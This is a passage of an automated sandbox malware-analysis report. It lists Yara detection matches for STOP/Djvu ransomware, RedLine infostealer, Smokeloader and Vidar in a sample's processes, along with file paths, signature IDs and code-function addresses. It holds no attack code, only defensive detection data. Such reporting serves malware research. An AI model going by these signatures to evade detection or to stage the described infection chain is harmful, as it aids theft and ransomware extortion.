Source: Yara match File source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: file.exe, 00000000.00000002.356947410.00000000008CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Djvu Ransomware
Source: Yara match File source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.37F1.exe.2eb9e80.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.48d0e67.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.5f8cf50.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.3.37F1.exe.4910000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.3.37F1.exe.2eb9e80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f8cf50.6.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.4b70000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70ee8.4.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.5999.exe.23715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.37F1.exe.5f55530.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8a18e.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4b70000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.37F1.exe.4a8b076.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5999.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.0.5999.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5999.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.510855251.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.356712809.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001E.00000002.539352220.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.426588359.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000E.00000000.432265249.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.505257421.00000000007A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.473163211.00000000022D7000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.357053208.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000012.00000002.512998427.0000000000968000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001E.00000000.507812417.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000003.417269957.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000000.430084061.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.356833950.0000000000841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000012.00000002.511826941.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.531865007.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.468874148.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.545785192.0000000004B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.356673245.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.444525144.0000000000889000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.508110815.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000000.427534356.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000000.510353848.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.466699994.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.442880266.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000E.00000002.469202987.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000C.00000002.540527249.0000000002E46000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000F.00000000.430570444.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000000.434348709.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000000.426731802.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.466941491.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000014.00000000.415949040.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000019.00000000.442875397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000002.535910271.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000000.428974978.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.504609430.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\49F6.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 520
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004022E9 0_2_004022E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418CFC 0_2_00418CFC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A886 0_2_0041A886
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041B4A1 0_2_0041B4A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139C7 0_2_004139C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E990 0_2_0040E990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419240 0_2_00419240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414270 0_2_00414270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041467C 0_2_0041467C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413E9C 0_2_00413E9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414A9C 0_2_00414A9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004187B8 0_2_004187B8
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004022E9 11_2_004022E9
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00418CFC 11_2_00418CFC
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041A886 11_2_0041A886
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041B4A1 11_2_0041B4A1
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004139C7 11_2_004139C7
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040E990 11_2_0040E990
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00419240 11_2_00419240
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00414270 11_2_00414270
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0041467C 11_2_0041467C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00413E9C 11_2_00413E9C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00414A9C 11_2_00414A9C
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_004187B8 11_2_004187B8
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00408C60 12_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0040DC11 12_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00407C3F 12_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418CCC 12_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00406CA0 12_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004028B0 12_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_0041A4BE 12_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418244 12_2_00418244
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00401650 12_2_00401650
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402F20 12_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004193C4 12_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00418788 12_2_00418788
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402F89 12_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_00402B90 12_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004073A0 12_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E84AB 12_2_048E84AB
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D2DF7 12_2_048D2DF7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D7EA6 12_2_048D7EA6
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D8EC7 12_2_048D8EC7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048DDE78 12_2_048DDE78
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D77D9 12_2_048D77D9
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D6F07 12_2_048D6F07
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048EA725 12_2_048EA725
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E8F33 12_2_048E8F33
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D18B7 12_2_048D18B7
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D786D 12_2_048D786D
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D3187 12_2_048D3187
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048E89EF 12_2_048E89EF
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D31F0 12_2_048D31F0
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_048D2B17 12_2_048D2B17
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
PE file contains more sections than normal
Source: sqlite3.dll.18.dr Static PE information: Number of sections : 18 > 10
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 12.2.37F1.exe.4a8b076.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.7290000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.7290000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4b70ee8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.0.5999.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.37F1.exe.5f55530.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f56418.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.4a8a18e.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.37F1.exe.5f56418.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
